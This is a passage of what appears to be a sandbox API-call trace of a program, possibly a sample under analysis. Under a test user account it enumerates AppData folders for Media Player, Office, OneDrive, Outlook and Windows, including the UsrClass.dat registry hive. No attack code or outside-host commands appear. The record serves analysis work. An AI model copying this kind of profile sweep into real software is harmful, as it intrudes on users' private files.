ftLastWriteTime.dwLowDateTime=0xcba84960, ftLastWriteTime.dwHighDateTime=0x1d706b2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0208.171] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x798152d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xcba84960, ftLastAccessTime.dwHighDateTime=0x1d706b2, ftLastWriteTime.dwLowDateTime=0xcba84960, ftLastWriteTime.dwHighDateTime=0x1d706b2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0208.171] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79b5b110, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b5b110, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x2ada6de0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x105000, dwReserved0=0x0, dwReserved1=0x0, cFileName="CurrentDatabase_372.wmdb", cAlternateFileName="CURREN~1.WMD")) returned 1 [0208.171] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79b5b110, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2acc25a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x2acc25a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x1106e, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalMLS_3.wmdb", cAlternateFileName="LOCALM~1.WMD")) returned 1 [0208.171] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7983b430, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7983b430, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf73e9a4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sync Playlists", cAlternateFileName="SYNCPL~1")) returned 1 [0208.171] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcba84960, ftCreationTime.dwHighDateTime=0x1d706b2, ftLastAccessTime.dwLowDateTime=0xcba84960, ftLastAccessTime.dwHighDateTime=0x1d706b2, ftLastWriteTime.dwLowDateTime=0xcba84960, ftLastWriteTime.dwHighDateTime=0x1d706b2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Transcoded Files Cache", cAlternateFileName="TRANSC~1")) returned 1 [0208.171] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcba84960, ftCreationTime.dwHighDateTime=0x1d706b2, ftLastAccessTime.dwLowDateTime=0xcba84960, ftLastAccessTime.dwHighDateTime=0x1d706b2, ftLastWriteTime.dwLowDateTime=0xcba84960, ftLastWriteTime.dwHighDateTime=0x1d706b2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Transcoded Files Cache", cAlternateFileName="TRANSC~1")) returned 0 [0208.171] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0208.172] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0208.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0208.173] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Office", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Office", lpFilePart=0x0) returned 0x31 [0208.173] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0208.173] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Office", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Office", lpFilePart=0x0) returned 0x31 [0208.173] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Office\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x14ff8dd0, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x5bb5ba10, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x5bb5ba10, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0208.174] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x14ff8dd0, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x5bb5ba10, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x5bb5ba10, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0208.174] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x14ff8dd0, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x2dbcc430, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2dbcc430, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="16.0", cAlternateFileName="")) returned 1 [0208.174] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5bb5ba10, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x44005180, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x44005180, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OTele", cAlternateFileName="")) returned 1 [0208.174] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5bb5ba10, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x44005180, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x44005180, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OTele", cAlternateFileName="")) returned 0 [0208.174] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0208.174] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0208.174] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0208.174] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive", lpFilePart=0x0) returned 0x33 [0208.174] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0208.175] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive", lpFilePart=0x0) returned 0x33 [0208.175] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8a7c4d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf26feb50, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf26feb50, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0208.176] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8a7c4d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf26feb50, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf26feb50, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0208.176] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe91c6830, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf26feb50, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf26feb50, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="17.3.4604.0120", cAlternateFileName="173460~1.012")) returned 1 [0208.176] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf26feb50, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf26feb50, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xe9617010, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x44aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneDrive.exe", cAlternateFileName="")) returned 1 [0208.176] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8a7c4d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xe8a7c4d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xe8a7c4d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup", cAlternateFileName="")) returned 1 [0208.176] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8a7c4d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xe8a7c4d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xe8a7c4d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup", cAlternateFileName="")) returned 0 [0208.176] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0208.176] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0208.176] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0208.176] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Outlook", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Outlook", lpFilePart=0x0) returned 0x32 [0208.176] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0208.177] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Outlook", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Outlook", lpFilePart=0x0) returned 0x32 [0208.177] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Outlook\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ce8e9d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x23884f50, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x23884f50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0208.177] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ce8e9d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x23884f50, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x23884f50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0208.178] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ce8e9d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2ce8e9d0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2ce8e9d0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="gliding", cAlternateFileName="")) returned 1 [0208.178] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d32b470, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x21cff0f0, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x21cff0f0, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x462, dwReserved0=0x0, dwReserved1=0x0, cFileName="mapisvc.inf", cAlternateFileName="")) returned 1 [0208.178] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x23884f50, ftCreationTime.dwHighDateTime=0x1d7100d, ftLastAccessTime.dwLowDateTime=0x242a2cd0, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x242a2cd0, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RoamCache", cAlternateFileName="ROAMCA~1")) returned 1 [0208.178] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x23884f50, ftCreationTime.dwHighDateTime=0x1d7100d, ftLastAccessTime.dwLowDateTime=0x242a2cd0, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x242a2cd0, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RoamCache", cAlternateFileName="ROAMCA~1")) returned 0 [0208.178] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0208.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0208.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0208.178] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows", lpFilePart=0x0) returned 0x32 [0208.178] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0208.178] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows", lpFilePart=0x0) returned 0x32 [0208.179] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb1ed8fe0, ftLastAccessTime.dwHighDateTime=0x1d73a91, ftLastWriteTime.dwLowDateTime=0xb1ed8fe0, ftLastWriteTime.dwHighDateTime=0x1d73a91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0208.179] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb1ed8fe0, ftLastAccessTime.dwHighDateTime=0x1d73a91, ftLastWriteTime.dwLowDateTime=0xb1ed8fe0, ftLastWriteTime.dwHighDateTime=0x1d73a91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0208.179] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x107d8460, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x10aabe80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x10aabe80, ftLastWriteTime.dwHighDateTime=0x1d706a9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0208.179] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x798152d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x46c35e30, ftLastAccessTime.dwHighDateTime=0x1d7a944, ftLastWriteTime.dwLowDateTime=0x46c35e30, ftLastWriteTime.dwHighDateTime=0x1d7a944, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Burn", cAlternateFileName="")) returned 1 [0208.179] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x798152d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x462fb4a0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x462fb4a0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Caches", cAlternateFileName="")) returned 1 [0208.179] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x797ef170, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b34fb0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x182897a, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Explorer", cAlternateFileName="")) returned 1 [0208.179] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x797ef170, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x797ef170, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xaef3b9d6, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="GameExplorer", cAlternateFileName="GAMEEX~1")) returned 1 [0208.179] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x797c9010, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b34fb0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe75c620, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0208.179] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb1ed8fe0, ftCreationTime.dwHighDateTime=0x1d73a91, ftLastAccessTime.dwLowDateTime=0xa18da600, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0xa18da600, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell", cAlternateFileName="POWERS~1")) returned 1 [0208.179] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7977cd50, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7977cd50, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf96dfdac, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ringtones", cAlternateFileName="RINGTO~1")) returned 1 [0208.179] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x796e47d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb10c4320, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0xb10c4320, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0208.180] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd49789d0, ftCreationTime.dwHighDateTime=0x1d72469, ftLastAccessTime.dwLowDateTime=0xd49789d0, ftLastAccessTime.dwHighDateTime=0x1d72469, ftLastWriteTime.dwLowDateTime=0xd49789d0, ftLastWriteTime.dwHighDateTime=0x1d72469, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Themes", cAlternateFileName="")) returned 1 [0208.180] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x79b0ee50, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc6aba9c0, ftLastAccessTime.dwHighDateTime=0x1d7e780, ftLastWriteTime.dwLowDateTime=0xa5fa7fa0, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UsrClass.dat", cAlternateFileName="")) returned 1 [0208.180] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x79b0ee50, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b0ee50, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xa5fa7fa0, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x1e400, dwReserved0=0x0, dwReserved1=0x0, cFileName="UsrClass.dat.LOG1", cAlternateFileName="USRCLA~2.LOG")) returned 1 [0208.180] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x79b0ee50, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b0ee50, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9c5705f, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UsrClass.dat.LOG2", cAlternateFileName="USRCLA~1.LOG")) returned 1 [0208.180] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x79ae8cf0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ae8cf0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x962222ec, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TM.blf", cAlternateFileName="USRCLA~1.BLF")) returned 1 [0208.180] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x79ae8cf0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ae8cf0, ftLastAccessTime.dwHighDateTime=0x1d70509, 